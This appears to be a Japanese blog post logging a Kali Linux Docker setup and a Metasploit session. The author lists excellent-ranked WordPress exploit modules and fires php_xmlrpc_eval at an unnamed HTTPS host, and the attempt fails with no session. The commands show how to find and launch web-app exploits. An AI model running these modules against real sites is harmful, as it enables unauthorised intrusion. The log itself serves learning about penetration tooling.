• 投稿者:
  • 投稿カテゴリー:security

Docker for Windows で Kali Linuxを起動してみる後に操作している。


PS C:\Users\shimizu> docker exec -it (コンテナID) /bin/bash

root@81c581d5cf43:/# apt-get update && apt-get -y upgrade && apt-get install -y kali-linux-web

root@81c581d5cf43:/# /etc/init.d/postgresql start
Starting PostgreSQL 12 database server: main.

root@81c581d5cf43:/# update-rc.d postgresql enable

root@81c581d5cf43:/# msfdb init


root@81c581d5cf43:/# msfconsole

  xMMMMMMMMMMWd.               .oNMMMMMMMMMMk
 oMMMMMMMMMMx.                    dMMMMMMMMMMx
.WMMMMMMMMM:                       :MMMMMMMMMM,
xMMMMMMMMMo                         lMMMMMMMMMO
NMMMMMMMMW                    ,cccccoMMMMMMMMMWlccccc;
xMMMMMMMMMd                        ,0MMMMMMMMMMK;
.WMMMMMMMMMc                         'OMMMMMM0,
 lMMMMMMMMMMk.                         .kMMO'
  dMMMMMMMMMMWd'                         ..
   cWMMMMMMMMMMMNxc'.                ##########
    .0MMMMMMMMMMMMMMMMWc            #+#    #+#
      ;0MMMMMMMMMMMMMMMo.          +:+
        .dNMMMMMMMMMMMMo          +#++:++#+
           'oOWMMMMMMMMo                +:+
               .,cdkO0K;        :+:    :+:

       =[ metasploit v5.0.66-dev                          ]
+ -- --=[ 1956 exploits - 1092 auxiliary - 336 post       ]
+ -- --=[ 558 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]


msf5 > search rank:excellent wordpress

Matching Modules

   #   Name                                                           Disclosure Date  Rank       Check  Description
   -   ----                                                           ---------------  ----       -----  -----------
   0   exploit/freebsd/local/rtld_execl_priv_esc                      2009-11-30       excellent  Yes    FreeBSD rtld execl() Privilege Escalation
   1   exploit/multi/http/wp_crop_rce                                 2019-02-19       excellent  Yes    WordPress Crop-image Shell Upload
   2   exploit/multi/http/wp_db_backup_rce                            2019-04-24       excellent  Yes    WP Database Backup RCE
   3   exploit/multi/http/wp_ninja_forms_unauthenticated_file_upload  2016-05-04       excellent  Yes    WordPress Ninja Forms Unauthenticated File Upload
   4   exploit/multi/http/wp_responsive_thumbnail_slider_upload       2015-08-28       excellent  Yes    WordPress Responsive Thumbnail Slider Arbitrary File Upload
   5   exploit/unix/webapp/joomla_akeeba_unserialize                  2014-09-29       excellent  Yes    Joomla Akeeba Kickstart Unserialize Remote Code Execution
   6   exploit/unix/webapp/jquery_file_upload                         2018-10-09       excellent  Yes    blueimp's jQuery (Arbitrary) File Upload
   7   exploit/unix/webapp/php_xmlrpc_eval                            2005-06-29       excellent  Yes    PHP XML-RPC Arbitrary Code Execution
   8   exploit/unix/webapp/wp_admin_shell_upload                      2015-02-21       excellent  Yes    WordPress Admin Shell Upload
   9   exploit/unix/webapp/wp_advanced_custom_fields_exec             2012-11-14       excellent  Yes    WordPress Plugin Advanced Custom Fields Remote File Inclusion
   10  exploit/unix/webapp/wp_ajax_load_more_file_upload              2015-10-10       excellent  Yes    WordPress Ajax Load More PHP Upload Vulnerability
   11  exploit/unix/webapp/wp_asset_manager_upload_exec               2012-05-26       excellent  Yes    WordPress Asset-Manager PHP File Upload Vulnerability
   12  exploit/unix/webapp/wp_creativecontactform_file_upload         2014-10-22       excellent  Yes    WordPress Creative Contact Form Upload Vulnerability
   13  exploit/unix/webapp/wp_downloadmanager_upload                  2014-12-03       excellent  Yes    WordPress Download Manager (download-manager) Unauthenticated File Upload
   14  exploit/unix/webapp/wp_easycart_unrestricted_file_upload       2015-01-08       excellent  No     WordPress WP EasyCart Unrestricted File Upload
   15  exploit/unix/webapp/wp_foxypress_upload                        2012-06-05       excellent  Yes    WordPress Plugin Foxypress uploadify.php Arbitrary Code Execution
   16  exploit/unix/webapp/wp_frontend_editor_file_upload             2012-07-04       excellent  Yes    WordPress Front-end Editor File Upload
   17  exploit/unix/webapp/wp_holding_pattern_file_upload             2015-02-11       excellent  Yes    WordPress Holding Pattern Theme Arbitrary File Upload
   18  exploit/unix/webapp/wp_inboundio_marketing_file_upload         2015-03-24       excellent  Yes    WordPress InBoundio Marketing PHP Upload Vulnerability
   19  exploit/unix/webapp/wp_infusionsoft_upload                     2014-09-25       excellent  Yes    WordPress InfusionSoft Upload Vulnerability
   20  exploit/unix/webapp/wp_lastpost_exec                           2005-08-09       excellent  No     WordPress cache_lastpostdate Arbitrary Code Execution
   21  exploit/unix/webapp/wp_mobile_detector_upload_execute          2016-05-31       excellent  Yes    WordPress WP Mobile Detector 3.5 Shell Upload
   22  exploit/unix/webapp/wp_nmediawebsite_file_upload               2015-04-12       excellent  Yes    WordPress N-Media Website Contact Form Upload Vulnerability
   23  exploit/unix/webapp/wp_optimizepress_upload                    2013-11-29       excellent  Yes    WordPress OptimizePress Theme File Upload Vulnerability
   24  exploit/unix/webapp/wp_photo_gallery_unrestricted_file_upload  2014-11-11       excellent  Yes    WordPress Photo Gallery Unrestricted File Upload
   25  exploit/unix/webapp/wp_pixabay_images_upload                   2015-01-19       excellent  Yes    WordPress Pixabay Images PHP Code Upload
   26  exploit/unix/webapp/wp_plainview_activity_monitor_rce          2018-08-26       excellent  Yes    WordPress Plainview Activity Monitor RCE
   27  exploit/unix/webapp/wp_platform_exec                           2015-01-21       excellent  No     WordPress Platform Theme File Upload Vulnerability
   28  exploit/unix/webapp/wp_property_upload_exec                    2012-03-26       excellent  Yes    WordPress WP-Property PHP File Upload Vulnerability
   29  exploit/unix/webapp/wp_reflexgallery_file_upload               2012-12-30       excellent  Yes    WordPress Reflex Gallery Upload Vulnerability
   30  exploit/unix/webapp/wp_revslider_upload_execute                2014-11-26       excellent  Yes    WordPress RevSlider File Upload and Execute Vulnerability
   31  exploit/unix/webapp/wp_slideshowgallery_upload                 2014-08-28       excellent  Yes    WordPress SlideShow Gallery Authenticated File Upload
   32  exploit/unix/webapp/wp_symposium_shell_upload                  2014-12-11       excellent  Yes    WordPress WP Symposium 14.11 Shell Upload
   33  exploit/unix/webapp/wp_total_cache_exec                        2013-04-17       excellent  Yes    WordPress W3 Total Cache PHP Code Execution
   34  exploit/unix/webapp/wp_worktheflow_upload                      2015-03-14       excellent  Yes    WordPress Work The Flow Upload Vulnerability
   35  exploit/unix/webapp/wp_wpshop_ecommerce_file_upload            2015-03-09       excellent  Yes    WordPress WPshop eCommerce Arbitrary File Upload Vulnerability
   36  exploit/unix/webapp/wp_wptouch_file_upload                     2014-07-14       excellent  Yes    WordPress WPTouch Authenticated File Upload
   37  exploit/unix/webapp/wp_wysija_newsletters_upload               2014-07-01       excellent  Yes    WordPress MailPoet Newsletters (wysija-newsletters) Unauthenticated File Upload
   38  exploit/windows/fileformat/ms12_005                            2012-01-10       excellent  No     MS12-005 Microsoft Office ClickOnce Unsafe Object Package Handling Vulnerability
   39  exploit/windows/fileformat/winrar_name_spoofing                2009-09-28       excellent  No     WinRAR Filename Spoofing


msf5 > use exploit/unix/webapp/php_xmlrpc_eval

msf5 exploit(unix/webapp/php_xmlrpc_eval) > info

       Name: PHP XML-RPC Arbitrary Code Execution
     Module: exploit/unix/webapp/php_xmlrpc_eval
   Platform: Unix
       Arch: cmd
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2005-06-29

Provided by:
  hdm <>
  cazz <>

Available targets:
  Id  Name
  --  ----
  0   Automatic

Check supported:

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  PATH     /xmlrpc.php      yes       Path to xmlrpc.php
  Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT    80               yes       The target port (TCP)
  SSL      false            no        Negotiate SSL/TLS for outgoing connections
  VHOST                     no        HTTP server virtual host

Payload information:
  Space: 512

  This module exploits an arbitrary code execution flaw discovered in
  many implementations of the PHP XML-RPC module. This flaw is
  exploitable through a number of PHP web applications, including but
  not limited to Drupal, WordPress, Postnuke, and TikiWiki.

  OSVDB (17793)



msf5 exploit(unix/webapp/php_xmlrpc_eval) > set RHOSTS

msf5 exploit(unix/webapp/php_xmlrpc_eval) > set RPORT 443
RPORT => 443

msf5 exploit(unix/webapp/php_xmlrpc_eval) > set SSL true
SSL => true

msf5 exploit(unix/webapp/php_xmlrpc_eval) > show options

Module options (exploit/unix/webapp/php_xmlrpc_eval):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   PATH     /xmlrpc.php      yes       Path to xmlrpc.php
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    443              yes       The target port (TCP)
   SSL      true             no        Negotiate SSL/TLS for outgoing connections
   VHOST                     no        HTTP server virtual host

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf5 exploit(unix/webapp/php_xmlrpc_eval) > exploit
[-] exploit failed: no response
[*] Exploit completed, but no session was created.